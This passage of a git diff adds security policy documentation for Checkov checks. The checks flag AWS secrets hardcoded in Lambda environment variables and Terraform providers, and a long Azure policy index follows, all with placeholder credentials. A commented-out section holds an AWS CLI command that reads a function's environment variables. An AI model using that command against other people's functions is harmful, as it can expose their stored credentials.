https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py[CKV_AWS_45] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +A function's metadata includes environment variable fields that contain small configurations that help the function execute. +These variables can be accessed by any entity with the most basic read-metadata-only permissions, and cannot be encrypted. +Lambda runtime makes environment variables available without passing secrets in code or environment variables. +We recommend you remove secrets from unencrypted places, especially if they can be easily accessed, to reduce the risk of exposing data to third parties. + +//// +=== Fix - Runtime + + +* CLI Command* + + +To see the secrets, run the following CLI command: + + +[source,shell] +---- +{ + "aws lambda get-function-configuration +--region & lt;REGION> +--function-name & lt;FUNCTION_NAME> +--query Environment.Variables", +} +---- +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::Lambda::Function +* *Arguments:* Properties.Environment.Variables + + +[source,yaml] +---- +Type: AWS::Lambda::Function + Properties: + ... + Environment: + Variables: + key1: not_a_secret +- key2: secret +---- + +*Terraform* + + +* *Resource:* aws_lambda_function +* *Argument* Block Environment Attribute variables + + +[source,go] +---- +resource "aws_lambda_function" "fail" { + function_name = "test-env" + role = "" + runtime = "python3.8" + + environment { + variables = { +- AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE", +- AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", +- AWS_DEFAULT_REGION = "us-west-2" + } + } +} +---- + +In this case the permissions would be better being added to an IAM Role. diff --git a/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-5.adoc b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-5.adoc new file mode 100644 index 000000000..171009b84 --- /dev/null +++ b/code-security/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-5.adoc @@ -0,0 +1,88 @@ +== AWS access keys and secrets are hard coded in infrastructure + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4cda0308-4a5b-47bb-ad2c-2029c0c01171 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/aws/credentials.py[CKV_AWS_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,Serverless,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* AWS access keys and secrets are hard coded in infrastructure* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4cda0308-4a5b-47bb-ad2c-2029c0c01171 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/aws/credentials.py [CKV_AWS_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,Serverless,TerraformPlan + +|=== +//// + + +=== Description + + +When accessing AWS programmatically users can select to use an access key to verify their identity, and the identity of their applications. +An access key consists of an access key ID and a secret access key. +Anyone with an access key has the same level of access to AWS resources. +We recommend you protect access keys and keep them private. +Specifically, do not store hard coded keys and secrets in infrastructure such as code, or other version-controlled configuration settings. + +=== Fix - Buildtime + + +*Terraform* + + +You really should not add your secrets to your Infrastructure code, obtain AWS through the keychain e.g. +via Environmental variables. +Remove any reference to access_key and secret_key. + + +[source,text] +---- +{ + "provider "aws" { + region = var.region + - access_key = "NOTEXACTLYAKEY" + - secret_key = "NOTACTUALLYASECRET" +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/secrets-policies/secrets-policies.adoc b/code-security/policy-reference/aws-policies/secrets-policies/secrets-policies.adoc new file mode 100644 index 000000000..8a4acd3cd --- /dev/null +++ b/code-security/policy-reference/aws-policies/secrets-policies/secrets-policies.adoc @@ -0,0 +1,24 @@ +== Secrets Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-secrets-1.adoc[EC2 user data exposes secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/EC2Credentials.py[CKV_AWS_46] +|HIGH + + +|xref:bc-aws-secrets-3.adoc[Lambda function's environment variables expose secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py[CKV_AWS_45] +|MEDIUM + + +|xref:bc-aws-secrets-5.adoc[AWS access keys and secrets are hard coded in infrastructure] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/aws/credentials.py[CKV_AWS_41] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/azure-general-policies.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/azure-general-policies.adoc new file mode 100644 index 000000000..40b3b5d26 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/azure-general-policies.adoc @@ -0,0 +1,438 @@ +== Azure General Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-general-1.adoc[Azure VM data disk is not encrypted with ADE/CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureManagedDiscEncryption.py[CKV_AZURE_2] +|HIGH + + +|xref:bc-azr-general-13.adoc[Azure Linux scale set does not use an SSH key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureScaleSetPassword.py[CKV_AZURE_49] +|HIGH + + +|xref:bc-azr-general-14.adoc[Virtual Machine extensions are installed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py[CKV_AZURE_50] +|MEDIUM + + +|xref:bc-azr-general-2.adoc[Azure App Service Web app authentication is off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py[CKV_AZURE_13] +|MEDIUM + + +|xref:bc-azr-general-3.adoc[Azure Microsoft Defender for Cloud security contact phone number is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py[CKV_AZURE_20] +|LOW + + +|xref:bc-azr-general-5.adoc[Azure Microsoft Defender for Cloud email notification for subscription owner is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py[CKV_AZURE_22] +|MEDIUM + + +|xref:bc-azr-general-6.adoc[Azure SQL Server threat detection alerts are not enabled for all threat types] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py[CKV_AZURE_25] +|HIGH + + +|xref:bc-azr-general-7.adoc[Azure SQL server send alerts to field value is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py[CKV_AZURE_26] +|HIGH + + +|xref:bc-azr-general-8.adoc[Azure SQL Databases with disabled Email service and co-administrators for Threat Detection] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py[CKV_AZURE_27] +|MEDIUM + + +|xref:ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc[Azure PostgreSQL Database Server 'Allow access to Azure services' enabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml[CKV2_AZURE_6] +|MEDIUM + + +|xref:ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc[Azure Built-in logging for Azure function app is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py[CKV_AZURE_159] +|LOW + + +|xref:ensure-azure-client-certificates-are-enforced-for-api-management.adoc[Azure Client Certificates are not enforced for API management] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py[CKV_AZURE_152] +|LOW + + +|xref:ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc[Azure Cognitive Services does not Customer Managed Keys (CMKs) for encryption] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml[CKV2_AZURE_22] +|LOW + + +|xref:ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc[Azure Data exfiltration protection for Azure Synapse workspace is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py[CKV_AZURE_157] +|LOW + + +|xref:ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc[Azure Machine Learning Compute Cluster Minimum Nodes is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py[CKV_AZURE_150] +|LOW + + +|xref:ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc[Azure PostgreSQL Flexible Server does not enable geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py[CKV_AZURE_136] +|LOW + + +|xref:ensure-azure-resources-that-support-tags-have-tags.adoc[Azure resources that support tags do not have tags] +|CKV_AZURE_CUSTOM_1 +|LOW + + +|xref:ensure-azure-sql-server-has-default-auditing-policy-configured.adoc[Azure SQL Server does not have default auditing policy configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py[CKV_AZURE_156] +|LOW + + +|xref:ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc[Azure Virtual machine enables password authentication] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py[CKV_AZURE_149] +|LOW + + +|xref:ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc[Storage Account name does not follow naming rules] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43] +|LOW + + +|xref:ensure-ftp-deployments-are-disabled.adoc[Azure App Services FTP deployment is All allowed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py[CKV_AZURE_78] +|MEDIUM + + +|xref:ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc[MSSQL is not using the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py[CKV_AZURE_52] +|MEDIUM + + +|xref:ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc[MySQL is not using the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py[CKV_AZURE_54] +|MEDIUM + + +|xref:ensure-standard-pricing-tier-is-selected.adoc[Azure Microsoft Defender for Cloud Defender plans is set to Off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py[CKV_AZURE_19] +|MEDIUM + + +|xref:ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc[Storage for critical data are not encrypted with Customer Managed Key] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml[CKV2_AZURE_1] +|HIGH + + +|xref:ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc[Active Directory is not used for authentication for Service Fabric] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py[CKV_AZURE_125] +|LOW + + +|xref:ensure-that-app-services-use-azure-files.adoc[App services do not use Azure files] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py[CKV_AZURE_88] +|LOW + + +|xref:ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc[Automatic OS image patching is disabled for Virtual Machine scale sets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py[CKV_AZURE_95] +|LOW + + +|xref:ensure-that-automation-account-variables-are-encrypted.adoc[Azure Automation account variables are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AutomationEncrypted.py[CKV_AZURE_73] +|LOW + + +|xref:ensure-that-azure-active-directory-admin-is-configured.adoc[Azure SQL servers which doesn't have Azure Active Directory admin configured] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml[CKV2_AZURE_7] +|LOW + + +|xref:ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc[Azure Batch account does not use key vault to encrypt data] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py[CKV_AZURE_76] +|LOW + + +|xref:ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc[Azure Data Explorer encryption at rest does not use a customer-managed key] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml[CKV2_AZURE_11] +|LOW + + +|xref:ensure-that-azure-data-explorer-uses-disk-encryption.adoc[Azure Data Explorer does not use disk encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py[CKV_AZURE_74] +|LOW + + +|xref:ensure-that-azure-data-explorer-uses-double-encryption.adoc[Azure Data Explorer does not use double encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py[CKV_AZURE_75] +|LOW + + +|xref:ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc[Azure data factories are not encrypted with a customer-managed key] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml[CKV2_AZURE_15] +|LOW + + +|xref:ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc[Azure Data Factory does not use Git repository for source control] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py[CKV_AZURE_103] +|LOW + + +|xref:ensure-that-azure-defender-is-set-to-on-for-app-service.adoc[Azure Microsoft Defender for Cloud is set to Off for App Service] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py[CKV_AZURE_61] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc[Azure Microsoft Defender for Cloud is set to Off for Azure SQL Databases] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py[CKV_AZURE_69] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc[Azure Microsoft Defender for Cloud is set to Off for Container Registries] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py[CKV_AZURE_86] +|HIGH + + +|xref:ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc[Azure Microsoft Defender for Cloud is set to Off for Key Vault] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py[CKV_AZURE_87] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc[Azure Security Center Defender set to Off for Kubernetes] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py[CKV_AZURE_85] +|HIGH + + +|xref:ensure-that-azure-defender-is-set-to-on-for-servers.adoc[Azure Microsoft Defender for Cloud is set to Off for Servers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py[CKV_AZURE_55] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc[Azure Microsoft Defender for Cloud is set to Off for SQL servers on machines] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py[CKV_AZURE_79] +|MEDIUM + + +|xref:ensure-that-azure-defender-is-set-to-on-for-storage.adoc[Azure Microsoft Defender for Cloud is set to Off for Storage] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py[CKV_AZURE_84] +|MEDIUM + + +|xref:ensure-that-cors-disallows-every-resource-to-access-app-services.adoc[CORS allows resource to access app services] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py[CKV_AZURE_57] +|LOW + + +|xref:ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc[CORS allows resources to access function apps] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py[CKV_AZURE_62] +|LOW + + +|xref:ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc[Cosmos DB Accounts do not have CMKs encrypting data at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py[CKV_AZURE_100] +|LOW + + +|xref:ensure-that-data-lake-store-accounts-enables-encryption.adoc[Unencrypted Data Lake Store accounts] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py[CKV_AZURE_105] +|MEDIUM + + +|xref:ensure-that-function-apps-enables-authentication.adoc[Azure Function App authentication is off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py[CKV_AZURE_56] +|MEDIUM + + +|xref:ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc[Azure Function App doesn't use HTTP 2.0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py[CKV_AZURE_67] +|MEDIUM + + +|xref:ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc[Azure App Service Web app does not use latest Java version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py[CKV_AZURE_83] +|LOW + + +|xref:ensure-that-key-vault-enables-purge-protection.adoc[Azure Key Vault Purge protection is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py[CKV_AZURE_110] +|MEDIUM + + +|xref:ensure-that-key-vault-enables-soft-delete.adoc[Key vault does not enable soft-delete] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py[CKV_AZURE_111] +|LOW + + +|xref:ensure-that-key-vault-key-is-backed-by-hsm.adoc[Key vault key is not backed by HSM] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py[CKV_AZURE_112] +|LOW + + +|xref:ensure-that-key-vault-secrets-have-content-type-set.adoc[Key vault secrets do not have content_type set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretContentType.py[CKV_AZURE_114] +|LOW + + +|xref:ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc[Managed disks do not use a specific set of disk encryption sets for customer-managed key encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py[CKV_AZURE_93] +|LOW + + +|xref:ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc[Azure App Service Web app does not have a Managed Service Identity] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py[CKV_AZURE_71] +|LOW + + +|xref:ensure-that-mariadb-server-enables-geo-redundant-backups.adoc[MariaDB server does not enable geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py[CKV_AZURE_129] +|LOW + + +|xref:ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc[Microsoft Antimalware is not configured to automatically update Virtual Machines] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml[CKV2_AZURE_10] +|LOW + + +|xref:ensure-that-my-sql-server-enables-geo-redundant-backups.adoc[My SQL server disables geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py[CKV_AZURE_94] +|LOW + + +|xref:ensure-that-my-sql-server-enables-threat-detection-policy.adoc[My SQL server does not enable Threat Detection policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py[CKV_AZURE_127] +|LOW + + +|xref:ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc[MySQL server does not enable customer-managed key for encryption] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_16] +|LOW + + +|xref:ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc[Azure App Service Web app doesn't use latest .Net framework version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py[CKV_AZURE_80] +|LOW + + +|xref:ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc[Azure App Service Web app does not use latest PHP version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py[CKV_AZURE_81] +|LOW + + +|xref:ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc[PostgreSQL server does not enable customer-managed key for encryption] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_17] +|LOW + + +|xref:ensure-that-postgresql-server-enables-geo-redundant-backups.adoc[PostgreSQL server enables geo-redundant backups] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py[CKV_AZURE_102] +|LOW + + +|xref:ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc[MySQL server disables infrastructure encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLEncryptionEnaled.py[CKV_AZURE_96] +|LOW + + +|xref:ensure-that-postgresql-server-enables-infrastructure-encryption.adoc[PostgreSQL server does not enable infrastructure encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py[CKV_AZURE_130] +|LOW + + +|xref:ensure-that-postgresql-server-enables-threat-detection-policy.adoc[PostgreSQL server does not enable Threat Detection policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py[CKV_AZURE_128] +|LOW + + +|xref:ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc[Azure App Service Web app does not use latest Python version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py[CKV_AZURE_82] +|LOW + + +|xref:ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc[Azure App Services Remote debugging is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RemoteDebggingNotEnabled.py[CKV_AZURE_72] +|LOW + + +|xref:ensure-that-security-contact-emails-is-set.adoc[Azure Microsoft Defender for Cloud security alert email notifications is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py[CKV_AZURE_131] +|MEDIUM + + +|xref:ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc[Service Fabric does not use three levels of protection available] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py[CKV_AZURE_126] +|LOW + + +|xref:ensure-that-sql-servers-enables-data-security-policy.adoc[Azure SQL server Defender setting is set to Off] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml[CKV2_AZURE_13] +|MEDIUM + + +|xref:ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc[Azure Storage account Encryption CMKs Disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountsUseCustomerManagedKeyForEncryption.yaml[CKV2_AZURE_18] +|LOW + + +|xref:ensure-that-unattached-disks-are-encrypted.adoc[Unattached disks are not encrypted] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml[CKV2_AZURE_14] +|LOW + + +|xref:ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml[CKV2_AZURE_5] +|LOW + + +|xref:ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) Periodic recurring scans is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml[CKV2_AZURE_3] +|LOW + + +|xref:ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' is not configured] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml[CKV2_AZURE_4] +|LOW + + +|xref:ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc[Virtual machine scale sets do not have encryption at host enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py[CKV_AZURE_97] +|LOW + + +|xref:ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc[Virtual Machines are not backed up using Azure Backup] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml[CKV2_AZURE_12] +|LOW + + +|xref:ensure-that-virtual-machines-use-managed-disks.adoc[Azure Linux and Windows Virtual Machines does not utilize Managed Disks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py[CKV_AZURE_92] +|LOW + + +|xref:ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml[CKV2_AZURE_2] +|LOW + + +|xref:ensure-the-key-vault-is-recoverable.adoc[Azure Key Vault is not recoverable] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py[CKV_AZURE_42] +|MEDIUM + + +|xref:ensure-virtual-machines-are-utilizing-managed-disks.adoc[Azure Virtual Machines does not utilise Managed Disks] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml[CKV2_AZURE_9] +|LOW + + +|xref:set-an-expiration-date-on-all-keys.adoc[Azure Key Vault Keys does not have expiration date] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyExpirationDate.py[CKV_AZURE_40] +|HIGH + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-1.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-1.adoc new file mode 100644 index 000000000..155bed6d0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-1.adoc @@ -0,0 +1,183 @@ +== Azure VM data disk is not encrypted with ADE/CMK + + +*Policy Details* + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 564c3bcd-7b29-4e6a-9da9-e929876a9f1f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureManagedDiscEncryption.py[CKV_AZURE_2] + +|Severity +|HIGH + +|Subtype +|Build +//' Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +*Description* + + +Azure encrypts data disks by default Server-Side Encryption (SSE) with platform-managed keys [SSE with PMK]. +It is recommended to use either SSE with Azure Disk Encryption [SSE with PMK+ADE] or Customer Managed Key [SSE with CMK] which improves on platform-managed keys by giving you control of the encryption keys to meet your compliance needs. +Encryption does not impact the performance of managed disks and there is no additional cost for the encryption. +//// +=== Fix - Runtime + + +*Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Select the *Management* tab and verify that you have a *Diagnostics 